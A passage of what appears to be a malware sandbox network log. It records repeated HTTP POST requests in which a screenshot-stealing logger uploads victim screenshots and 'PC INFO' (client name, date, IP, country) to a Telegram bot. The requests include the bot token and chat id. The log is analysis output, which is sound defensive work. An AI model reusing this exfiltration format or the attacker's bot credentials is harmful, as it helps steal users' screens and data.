ountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3092a11feff8Host: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd30b12863fb9cHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd30ce2e1e282eHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd30ec763a8fb4Host: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd310a9e90ae48Host: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3128a6f6645dHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31468f673866Host: api.telegram.orgContent-Length: 687750Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3162fe5544a6Host: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3188ba9618b0Host: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a8e9a779cfHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31c4f413e0f2Host: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e0e1c570f1Host: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
